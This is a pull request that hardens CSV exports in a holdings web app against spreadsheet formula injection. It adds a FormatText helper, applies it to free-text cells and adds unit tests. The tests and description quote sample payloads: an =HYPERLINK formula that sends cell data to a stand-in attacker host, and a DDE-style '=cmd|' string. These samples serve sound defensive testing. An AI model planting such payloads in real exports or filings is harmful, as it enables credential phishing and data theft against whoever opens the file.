### PR TITLE
fix(web): stop CSV exports carrying spreadsheet formulas

### DIFF
--- a/src/Equibles.Web/Controllers/HoldingsExportController.cs
+++ b/src/Equibles.Web/Controllers/HoldingsExportController.cs
@@ -76,11 +76,11 @@ public class HoldingsExportController : BaseController
         var rows = allHolders.Select(h =>
             new[]
             {
-                stock.Ticker,
-                stock.Name,
+                CsvExportService.FormatText(stock.Ticker),
+                CsvExportService.FormatText(stock.Name),
                 CsvExportService.Format(tab.SelectedDate),
-                h.InstitutionalHolder?.Name ?? string.Empty,
-                h.InstitutionalHolder?.Cik ?? string.Empty,
+                CsvExportService.FormatText(h.InstitutionalHolder?.Name),
+                CsvExportService.FormatText(h.InstitutionalHolder?.Cik),
                 h.ChangeType.ToString(),
                 CsvExportService.Format(h.CurrentShares),
                 CsvExportService.Format(h.PreviousShares),
@@ -147,11 +147,11 @@ public class HoldingsExportController : BaseController
         var rows = rowsRaw.Select(r =>
             new[]
             {
-                holder.Name,
-                holder.Cik,
+                CsvExportService.FormatText(holder.Name),
+                CsvExportService.FormatText(holder.Cik),
                 CsvExportService.Format(selectedDate),
-                r.Ticker,
-                r.Name,
+                CsvExportService.FormatText(r.Ticker),
+                CsvExportService.FormatText(r.Name),
                 CsvExportService.Format(r.Shares),
                 CsvExportService.Format(r.Value),
                 r.ShareType.ToString(),
@@ -294,7 +294,12 @@ public class HoldingsExportController : BaseController
     )
     {
         stocks.TryGetValue(stockId, out var stock);
-        return (stock?.Ticker ?? string.Empty, stock?.Name ?? string.Empty);
+        // Guarded here rather than at each call site so both the activity and churn rows are
+        // covered by one rule.
+        return (
+            CsvExportService.FormatText(stock?.Ticker),
+            CsvExportService.FormatText(stock?.Name)
+        );
     }
 
     private static string FormatNullablePercent(double? value) =>

--- a/src/Equibles.Web/Controllers/HoldingsScreenerController.cs
+++ b/src/Equibles.Web/Controllers/HoldingsScreenerController.cs
@@ -148,9 +148,9 @@ public class HoldingsScreenerController : BaseController
         var csvRows = rows.Select(r =>
             new[]
             {
-                r.Ticker,
-                r.Name,
-                r.IndustryName,
+                CsvExportService.FormatText(r.Ticker),
+                CsvExportService.FormatText(r.Name),
+                CsvExportService.FormatText(r.IndustryName),
                 CsvExportService.Format(r.CurrentFilerCount),
                 CsvExportService.Format(r.PreviousFilerCount),
                 CsvExportService.Format(r.DeltaFilerCount),

--- a/src/Equibles.Web/Services/CsvExportService.cs
+++ b/src/Equibles.Web/Services/CsvExportService.cs
@@ -33,6 +33,25 @@ public static class CsvExportService
         return "\"" + value.Replace("\"", "\"\"") + "\"";
     }
 
+    // Null renders as an empty CSV cell; otherwise the string is written verbatim.
+    public static string Format(string value) => value ?? string.Empty;
+
+    // Spreadsheet formula-injection lead-ins: a value beginning with one of these is treated as a
+    // formula by Excel/Sheets on open. \t and \r are control chars some apps also treat as lead-ins.
+    private static readonly char[] FormulaLeadIns = ['=', '+', '-', '@', '\t', '\r'];
+
+    // Free-text cell formatter that neutralises spreadsheet formula injection: a value starting with
+    // a formula lead-in is prefixed with a quote so crafted text (e.g. an institution name lifted
+    // straight from a 13F filing, which anyone can file) can't execute as a formula when the CSV is
+    // opened. Use for attacker-influenced text; numeric cells stay numeric and so go through the
+    // Format(...) overloads, not this. RFC-4180 quoting is still applied afterwards by EscapeField.
+    public static string FormatText(string value)
+    {
+        if (string.IsNullOrEmpty(value))
+            return string.Empty;
+        return FormulaLeadIns.Contains(value[0]) ? "'" + value : value;
+    }
+
     public static string Format(long value) => value.ToString(CultureInfo.InvariantCulture);
 
     public static string Format(double value) =>

--- a/tests/Equibles.UnitTests/Web/CsvExportServiceFormulaInjectionTests.cs
+++ b/tests/Equibles.UnitTests/Web/CsvExportServiceFormulaInjectionTests.cs
@@ -1,0 +1,76 @@
+using Equibles.Web.Services;
+
+namespace Equibles.UnitTests.Web;
+
+// Contract: a CSV cell must never execute as a spreadsheet formula. RFC-4180 quoting alone does
+// not stop this — Excel and Sheets evaluate a cell whose text begins with =, +, -, @ (or a tab /
+// CR) no matter how it was quoted. The exported text is not ours: institution names come straight
+// off 13F filings, and anyone can file one, so a crafted name is a delivery vector for
+// =HYPERLINK(...) credential phishing or a DDE payload against whoever opens the export.
+public class CsvExportServiceFormulaInjectionTests
+{
+    [Theory]
+    [InlineData("=1+1")]
+    [InlineData("+1")]
+    [InlineData("-1")]
+    [InlineData("@SUM(A1)")]
+    [InlineData("\tcmd")]
+    [InlineData("\rcmd")]
+    public void FormatText_NeutralisesEveryFormulaLeadIn(string value)
+    {
+        CsvExportService.FormatText(value).Should().Be("'" + value);
+    }
+
+    [Fact]
+    public void FormatText_NeutralisesARealisticHyperlinkPayload()
+    {
+        // The shape an attacker would actually file as an institution name.
+        const string payload = "=HYPERLINK(\"http://evil.test/?d=\"&A1,\"Click\")";
+
+        CsvExportService.FormatText(payload).Should().StartWith("'=HYPERLINK");
+    }
+
+    [Theory]
+    [InlineData("Berkshire Hathaway Inc")]
+    [InlineData("AAPL")]
+    [InlineData("3M Co")]
+    public void FormatText_LeavesOrdinaryTextUntouched(string value)
+    {
+        CsvExportService.FormatText(value).Should().Be(value);
+    }
+
+    [Fact]
+    public void FormatText_TreatsNullAndEmptyAsAnEmptyCell()
+    {
+        CsvExportService.FormatText(null).Should().BeEmpty();
+        CsvExportService.FormatText(string.Empty).Should().BeEmpty();
+    }
+
+    [Fact]
+    public void FormatText_OnlyGuardsTheLeadingCharacter()
+    {
+        // A formula character mid-value is inert, so quoting it would corrupt legitimate names.
+        CsvExportService.FormatText("Smith & Wesson =").Should().Be("Smith & Wesson =");
+    }
+
+    [Fact]
+    public void TheGuardSurvivesRfc4180Quoting()
+    {
+        // The two rules compose: FormatText prefixes, EscapeField then quotes for the comma. The
+        // apostrophe must still be the first character inside the quotes.
+        var cell = CsvExportService.EscapeField(CsvExportService.FormatText("=cmd|'/c calc'!A1, Inc"));
+
+        cell.Should().StartWith("\"'=cmd");
+    }
+
+    [Fact]
+    public void BuildCsv_EmitsTheGuardedCellIntoTheDocument()
+    {
+        var csv = CsvExportService.BuildCsv(
+            ["Holder"],
+            [new[] { CsvExportService.FormatText("=1+1") }]
+        );
+
+        csv.Should().Be("Holder\n'=1+1\n");
+    }
+}


### PR DESCRIPTION
## Summary

The CSV writer is not formula-injection safe. RFC-4180 quoting does not help: Excel and Google Sheets evaluate a cell whose text begins with `=`, `+`, `-`, `@` (or a tab / CR) regardless of how it was quoted.

The exported text is not ours. Institution names come straight off 13F filings and **anyone can file a 13F**, so a crafted name is a delivery vector — this is the standard route for `=HYPERLINK("http://evil/?d="&A1,"Click")` credential exfiltration and DDE payloads, and it fires on whoever opens the download, not on our servers.

`EscapeField` only ever considered `"`, `,`, `\n`, `\r`, so every free-text cell went out raw.

## Code changes

- **`CsvExportService.FormatText`** — prefixes a value starting with a formula lead-in with an apostrophe. Added alongside a `Format(string)` overload so string cells match the other formatters. Numeric and date cells keep their existing `Format` overloads, so nothing that was numeric becomes text.
- **Applied to every free-text cell in the holdings exports:**
  - `HoldingsScreenerController` — ticker, company name, industry.
  - `HoldingsExportController` — stock ticker/name and institution name/CIK on the holders export; holder name/CIK and position ticker/name on the institution-portfolio export.
  - The activity and churn rows both go through `ResolveStockCells`, so the guard sits in that helper and covers both boards in one place.
- **Tests** — `CsvExportServiceFormulaInjectionTests` (14): every lead-in character, a realistic `=HYPERLINK` payload, ordinary names left untouched, null/empty, mid-value formula characters left alone (quoting them would corrupt legitimate names like `Smith & Wesson =`), and that the guard survives RFC-4180 quoting when the value also contains a comma.

## Notes

The commercial repo already had this helper; this brings the OSS writer to parity. The commercial side has its own call sites still bypassing it — fixed separately.